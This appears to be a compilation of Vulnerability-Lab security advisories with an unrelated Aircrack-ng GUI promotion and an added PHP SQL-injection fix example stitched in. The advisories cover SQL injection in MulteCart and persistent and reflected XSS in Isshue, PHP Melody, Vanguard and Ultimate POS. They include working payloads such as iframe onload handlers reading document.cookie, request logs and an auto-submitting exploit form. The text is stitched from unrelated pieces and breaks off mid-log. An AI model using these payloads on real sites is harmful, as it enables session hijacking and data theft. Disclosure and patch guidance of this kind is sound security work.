#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yii\base\Module->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yii\web\Application->handleRequest(Object(yii\web\Request))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yii\base\Application->run()
#14 {main}
-
Next yii\db\Exception: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): yii\db\Schema->convertException(Object(PDOException), 'SELECT * FROM `...')
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yii\db\Command->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yii\db\Command->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yii\db\Command->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yii\db\Query->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yii\db\ActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multeback\modules\inventory\controllers\InventoryController->findModel('-1'')
#7 [internal function]: multeback\modules\inventory\controllers\InventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yii\base\InlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yii\base\Controller->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yii\base\Module->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yii\web\Application->handleRequest(Object(yii\web\Request))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yii\base\Application->run()
#14 {main}

Debug Array:
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
-

Reference(s):
https://multecartultimate.localhost:8080/vendor/vendor/view
https://multecartultimate.localhost:8080/customer/customer/view
https://multecartultimate.localhost:8080/inventory/inventory/update
https://multecartultimate.localhost:8080/order/sub-order/view-order

Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following description ...
1. Do not display the sql errors to users other than the admin, or pipe them into a local log file outside the panel ui
2. Use prepared statements to protect the query against further injection attacks
3. Restrict the vulnerable id parameter to disallow the usage of special chars in post and get method requests
4. Encode and escape the id content of get method requests with the id parameter

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
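The four items under "Solution - Fix & Patch" above map onto a few lines of PHP. The example below is added here and is not MulteCart's code: the real findModel() in InventoryController is not on the page, only its stack trace, so the table layout, the two function bodies, the sample rows and the in-memory SQLite database standing in for MariaDB are all constructed for the demo.

```php
<?php
// Added example (not MulteCart code): input validation, a prepared statement and
// quiet error handling for a lookup like /inventory/inventory/update?id=...
// Table, rows and both function bodies are constructed for this demo.
declare(strict_types=1);

// In-memory SQLite stands in for the MariaDB database named in the error logs.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE tbl_inventory (id INTEGER PRIMARY KEY, sku TEXT, qty INTEGER)');
$pdo->exec("INSERT INTO tbl_inventory VALUES (1, 'DEMO-001', 10), (2, 'DEMO-002', 0)");

// The pattern behind the logged statement "SELECT * FROM `tbl_inventory` WHERE id=-1'":
// the raw GET value is concatenated into the SQL text, so a quote character ends
// the literal and whatever follows becomes part of the statement. Shown only for
// contrast; it is never called below.
function findModelVulnerable(PDO $pdo, string $id): ?array
{
    $row = $pdo->query("SELECT * FROM tbl_inventory WHERE id=$id")->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Hardened version:
//  (1) the id must be a positive integer before any SQL runs (solution items 3 and 4);
//  (2) the value is bound as a typed parameter, never spliced into the statement (item 2);
//  (3) driver errors are logged server-side and turned into "not found", so the
//      SQLSTATE text and stack trace quoted in the advisory never reach the client (item 1).
function findModel(PDO $pdo, string $id): ?array
{
    $validId = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($validId === false) {
        // Rejects "1' union select ..." and similar before touching the database.
        throw new InvalidArgumentException('id must be a positive integer');
    }
    try {
        $stmt = $pdo->prepare('SELECT * FROM tbl_inventory WHERE id = :id');
        $stmt->bindValue(':id', $validId, PDO::PARAM_INT);
        $stmt->execute();
        $row = $stmt->fetch(PDO::FETCH_ASSOC);
        return $row ?: null;
    } catch (PDOException $e) {
        // Log locally; never render the driver message into the panel UI.
        error_log('inventory lookup failed: ' . $e->getMessage());
        return null;
    }
}

// Demo: one valid id, the advisory's own query-string payload, and a negative id.
$inputs = ['1', "1' union select 1,2,3,4,@@version--", '-1'];
foreach ($inputs as $raw) {
    try {
        $row = findModel($pdo, $raw);
        printf("id=%s -> %s\n", $raw, $row ? json_encode($row) : 'not found');
    } catch (InvalidArgumentException $e) {
        printf("id=%s -> rejected (%s)\n", $raw, $e->getMessage());
    }
}
```

With the id bound as PDO::PARAM_INT after filter_var, the union-select strings in the PoC section cannot be expressed as a value at all, and the controller returns a generic "not found" instead of echoing the SQLSTATE text. In a Yii2 application the same effect comes from looking the record up with a hash condition (for instance `Inventory::findOne(['id' => (int)$id])`) rather than a string condition, and from keeping YII_DEBUG off in production so exception pages are not rendered to users.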
-
Title: Aircrack-ng Visualization Operation
Dear reader, are you still having trouble with Aircrack-ng's many commands? He is here, he is here: the Aircrack-ng graphical operation program is here! Make your operation lighter and your kidneys more overdrawn.

Installation
cd Aircrack-ng gui                 # enter the directory
pip install -r requirements.txt    # install dependencies (the required dependencies are basically already installed in Kali)
python3 aircrack-gui.py

User Guide
Startup interface
Scan the network
Capture handshake file
Configure dictionary and handshake package
Cracking effect

Summary
Simply put, it visualizes the Aircrack-ng commands, which is more convenient for novices to use. Of course, if you want a higher level of control, try the command line.

Attachment Download
Aircrack-ng
Decompression password: follow the WeChat official account (kali Hacker Notes) and reply kali666 in the backend to obtain it automatically.
-
Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
# Version: 3.5

Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284

Release Date:
=============
2021-10-22

Vulnerability Laboratory ID (VL-ID):
====================================
2284

Common Vulnerability Scoring System:
====================================
5.1

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is an all-in-one package for website management with a backend admin panel to manage inventory, orders, products, invoicing and so on. No regular monthly subscription fee is needed; get it through a one-time payment now. Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and save time. You need the best eCommerce shopping cart software, one which is flexible, upgradable and affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce solutions. Isshue is the best choice for any type of e-commerce business, big or small.

(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.

Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Medium User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

An input validation web vulnerability has been discovered in the title input fields of the `new invoice`, `customer` and `stock` modules. The `title` input and parameter allows injecting own malicious script code with a persistent attack vector. The content of the input and parameter is insecurely validated, which allows remote attackers with privileged user accounts (manager/keeper/admin) to inject their own malformed script code that executes on preview. The request method to inject is POST and the attack vector is persistent on the application side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Title

Vulnerable Input(s):
[+] Title

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] stock
[+] customer
[+] invoice

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a keeper account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source:
<div class="row">
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
<div class="panel-heading ui-sortable-handle">
<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right">
<li><a data-func="editTitle" data-tooltip="Edit title" data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i> <span class="control-title">Edit title</span></a></li>
<li><a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li>
<li><a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li>
<li><a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li>
<li><a data-func="expand" data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li>
<li><a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title=""> <i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
<div class="panel-body">
<div class="row">
<div class="col-sm-8" id="payment_from_1">
<div class="form-group row">
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
<div class="col-sm-6">
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
</div>

--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de- 1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de- 1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
-
PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
# Exploit Title: PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
# Date: 2021-10-21
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html

Document Title:
===============
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2291

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-21

Vulnerability Laboratory ID (VL-ID):
====================================
2291

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the PHP Melody v3.0 video cms web-application.

Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the PHP Melody v3.0 video cms web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent cross site web vulnerability is located in the video editor (WYSIWYG) with the tinymce class. Privileged user accounts such as editors are able to inject their own malicious script code via the editor to provoke a public execution by users or administrators. The request method to inject is GET, and after the save into the DBMS via a POST request the attack vector becomes persistent.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)

Vulnerable File(s):
[+] edit-episode.php

Vulnerable Parameter(s):
[+] episode_id

Affected Module(s):
[+] description

Proof of Concept (PoC):
=======================
The persistent validation vulnerability can be exploited by remote attackers with a privileged editor user account and with low user interaction. For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Payload
<p><a title=""><iframe src="//phpmelody.localhost.com:8080/admin/[PWND]">">">" href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p>

--- PoC Session Logs (GET) [WYSIWYG] ---
https://phpmelody.localhost.com:8080/admin/[PWND]
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88; cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNw%3D%3D; pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html;
vary: Accept-Encoding

Vulnerable Source: Video Editor (WYSIWYG - tinymce)
<textarea name="description" cols="100" id="textarea-WYSIWYG" class="tinymce" style="display: none;" aria-hidden="true"><p><test title=""><iframe src="//phpmelody.localhost.com:8080/admin/evil.source">">">" href="https://phpmelody.localhost.com:8080/admin/"><iframe%20src=evil.source onload=alert(document.cookie)>">">">">"></iframe></a></p></textarea>
<span class="autosave-message"></span>
</div></div>

Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/edit-episode.php
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1

Solution - Fix & Patch:
=======================
Encode and sanitize the input description parameter of the web editor tinymce class for moderators, editors or users to prevent attacks.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
-
Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
# Exploit Title: Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975
# Version: 2.1

Document Title:
===============
Vanguard v2.1 - (Search) POST Inject Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2283

Release Date:
=============
2021-10-26

Vulnerability Laboratory ID (VL-ID):
====================================
2283

Common Vulnerability Scoring System:
====================================
4

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a post inject web vulnerability in the Vanguard v2.1 cms web-application.

Affected Product(s):
====================
VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A non-persistent post inject web vulnerability has been discovered in the official Vanguard v2.1 cms web-application. The vulnerability allows remote attackers to inject malicious script code in POST method requests to compromise user session data or to manipulate application contents for clients.

The vulnerability is located in the phps_query parameter of the search module. The vulnerability is a classic post injection web vulnerability with a non-persistent attack vector.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] phps_query

Proof of Concept (PoC):
=======================
The client-side post inject web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source: search
<div class="ui yellow basic segment"></div>
<div class="ui container" style="margin-top: -0.7em;">
<form method="POST" action="https://vanguard.squamifer.ovh/search">
<div class="ui action input fluid">
<input name="phps_query" type="text" value=""><iframe src=a onload=alert(document.cookie)>" placeholder="Search for a product...">
<button class="ui button" type="submit" name="phps_search"><i class="search icon"></i>Search</button></div></form>
<div class="ui divider"></div>
<div class="ui cards aligned centered">
<div class="alert color blue-color"><div class="ui hidden divider"></div>
<div class="ui icon info message"><i class="help circle icon"></i><div class="content">
<div class="header">No results found for <strong><iframe src=evil.source onload=alert(document.cookie)></strong>.</div></div></div></div>
</div></div></div>

--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20<iframe src=evil.source onload=alert(document.cookie)>&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding

Exploitation: PoC
<html>
<head>
<title>PoC</title>
<style type="text/css">
#nodisplay { display:none; }
</style>
</head>
<body>
<div id="nodsiplay">
<form action="https://vanguard.localhost:8080/search" method="post">
<input type="text" name="phps_query" value=">%20<iframe src=evil.source onload=alert(document.cookie)>"/>
</form>
</div>
<script>
function submitForm() { document.forms[0].submit(); }
submitForm();
</script>
</body>
</html>

Security Risk:
==============
The security risk of the validation web vulnerability in the web-application is estimated as medium.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE LUDWIG-ERHARD STRAßE 4 34131 KASSEL - HESSEN DEUTSCHLAND (DE)
-
Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
# Exploit Title: Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
# Date: 2021-10-26
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://ultimatefosters.com/docs/ultimatepos/
# Version: 4.4

Document Title:
===============
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2296


Release Date:
=============
2021-10-26


Vulnerability Laboratory ID (VL-ID):
====================================
2296


Common Vulnerability Scoring System:
====================================
5.6


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Ultimate POS is an ERP, stock management, point of sale and invoicing web-application. The application uses a MySQL database management system in combination with PHP 7.2.

(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Ultimate POS v4.4 ERP stock management web-application.


Affected Product(s):
====================
thewebfosters
Product: Ultimate POS v4.4 - ERP (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in the Ultimate POS v4.4 ERP stock management web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application requests from the application side.

The persistent validation web vulnerability is located in the name parameter of the add products module. Remote attackers with vendor privileges (i.e. permission to add products) are able to inject their own malicious script code. The request method to inject is POST and the attack vector is persistent. Injection is possible via edit or via creation of a new product.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Products (Add)

Vulnerable Input(s):
[+] Product Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Products List


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with a privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.


PoC: Payload
test"><iframe src="evil.source" onload=alert(document.cookie)></iframe>
test"><img src="evil.source" onload=alert(document.cookie)></img>


--- PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvVnhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test"><iframe src=evil.source onload=alert(document.cookie)></iframe>&sku=&barcode_type=C128&unit_id=1&brand_id=
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptbkhvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D; Max-Age=7200; path=/; httponly


--- PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------407073296625600179063246902867
Content-Length: 4064
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/23/edit
